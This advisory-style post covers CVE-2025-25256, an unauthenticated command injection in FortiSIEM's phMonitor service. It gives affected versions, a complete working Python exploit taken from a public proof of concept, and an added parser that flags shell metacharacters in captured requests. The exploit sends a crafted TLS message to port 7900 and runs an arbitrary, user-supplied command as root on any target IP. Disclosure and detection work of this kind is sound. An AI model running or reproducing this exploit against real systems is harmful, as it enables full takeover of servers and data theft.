0x00 Introduction
Fortinet FortiSIEM is a security information and event management (SIEM) platform developed by Fortinet. It is designed to combine security operations center (SOC) and network operations center (NOC) functions, giving enterprises comprehensive security monitoring, threat detection and automated response across their IT and communications infrastructure.
0x01 Vulnerability description
The vulnerability stems from an input validation flaw in the phMonitor component of Fortinet FortiSIEM when it handles requests; it is a classic OS command injection.
Specifically, the input filtering in the handleStorageArchiveRequest function of the phMonitor process is incomplete. An unauthenticated attacker can trigger command injection by sending a crafted CLI request (carried over a custom RPC protocol that listens on TCP/7900 and is wrapped in TLS) without any authorization.
Because the service runs as root, an attacker can execute arbitrary commands, potentially leading to data leakage, complete takeover of the server and other serious consequences.
0x02 CVE identifier
CVE-2025-25256
0x03 Affected versions
5.4.0 <= FortiSIEM < 6.7.10
7.0.0 <= FortiSIEM < 7.0.4
7.1.0 <= FortiSIEM < 7.1.8
7.2.0 <= FortiSIEM < 7.2.6
7.3.0 <= FortiSIEM < 7.3.2
0x04 Vulnerability details
PoC:
https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256
import ssl
import argparse
import socket

def build_message(payload):
    # phMonitor framing as used by the PoC: four little-endian uint32 header
    # fields (message type, body length, a fixed constant, and zero) followed
    # by the XML body.
    header_values = [
        90,
        len(payload),
        1075724911,
        0
    ]
    header = b''.join(val.to_bytes(4, byteorder='little') for val in header_values)
    return header + payload.encode()

# Storage archive request; the archive directory field is the injection point.
XML_TEMPLATE = """
<root>
    <archive_storage_type>nfs</archive_storage_type>
    <archive_nfs_server_ip>127.0.0.1</archive_nfs_server_ip>
    <archive_nfs_archive_dir>`{peanut}`</archive_nfs_archive_dir>
    <scope>local</scope>
</root>
"""

def exploit(target, xml_payload):
    # phMonitor speaks its RPC protocol inside TLS on TCP/7900; the certificate
    # is not validated here.
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    with socket.create_connection((target, 7900)) as sock:
        with context.wrap_socket(sock, server_hostname=target) as ssock:
            message = build_message(xml_payload)
            ssock.sendall(message)
            print("[+] Packet Sent! ^-^")
            try:
                response = ssock.recv(1024)
            except Exception:
                print("[!] Something went wrong!")

banner = """ __ ___ ___________
__ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________
\\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\
\\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/
\\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__|
\\/ \\/ \\/
watchTowr-vs-FortiSIEM-CVE-2025-25256.py
(*) FortiSIEM Unauthenticated Remote Command Execution Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-25256]
"""
print(banner)

parser = argparse.ArgumentParser(description="Detection Artifact Generator for CVE-2025-25256")
parser.add_argument('-r', '--target', required=True, help='Target IP address')
parser.add_argument('-c', '--command', required=False, default="peanutioc", help='Command to execute')
args = parser.parse_args()

# Spaces are replaced with ${IFS} so the command survives the single-token field.
c = args.command.replace(' ', '${IFS}')
xml_payload = XML_TEMPLATE.format(peanut=c)
exploit(args.target, xml_payload)
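As an added defender-side example (not part of the original post or the watchTowr PoC), the following parser applies the header framing seen in build_message above to phMonitor request bodies captured on TCP/7900 after TLS termination, and flags storage archive requests whose NFS fields contain shell metacharacters such as backticks, $( or ${IFS}. The XML field names are those used in the PoC; the sample messages are constructed here for testing.

```python
import re
import struct
import xml.etree.ElementTree as ET

# Header framing from the PoC: four little-endian uint32 fields, the second
# being the length of the XML body that follows.
HEADER_FMT = "<4I"
HEADER_LEN = struct.calcsize(HEADER_FMT)
# Sequences that have no business in an NFS server address or directory path;
# the PoC relies on backticks and substitutes ${IFS} for spaces.
SHELL_META = re.compile(r"`|\$\(|\$\{|;|\||&|\n")
WATCHED_TAGS = ("archive_nfs_archive_dir", "archive_nfs_server_ip")

def parse_message(raw: bytes):
    """Split a captured phMonitor message into (header_fields, xml_body).
    Returns None when the buffer is too short or the declared body length
    does not match what was actually received."""
    if len(raw) < HEADER_LEN:
        return None
    fields = struct.unpack(HEADER_FMT, raw[:HEADER_LEN])
    body = raw[HEADER_LEN:]
    if fields[1] != len(body):
        return None
    return fields, body

def suspicious_fields(raw: bytes):
    """Return the names of watched XML fields carrying shell metacharacters."""
    parsed = parse_message(raw)
    if parsed is None:
        return []
    _, body = parsed
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []
    return [tag for tag in WATCHED_TAGS
            if (el := root.find(tag)) is not None
            and el.text and SHELL_META.search(el.text)]

def build_sample(archive_dir: str) -> bytes:
    """Constructed test input only: a storage archive request in the PoC framing."""
    xml = ("<root><archive_storage_type>nfs</archive_storage_type>"
           "<archive_nfs_server_ip>127.0.0.1</archive_nfs_server_ip>"
           f"<archive_nfs_archive_dir>{archive_dir}</archive_nfs_archive_dir>"
           "<scope>local</scope></root>").encode()
    return struct.pack(HEADER_FMT, 90, len(xml), 1075724911, 0) + xml

if __name__ == "__main__":
    print(suspicious_fields(build_sample("/export/archive")))   # benign: []
    print(suspicious_fields(build_sample("`peanutioc`")))       # flagged
```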
0x05 References
https://fortiguard.fortinet.com/psirt/FG-IR-25-152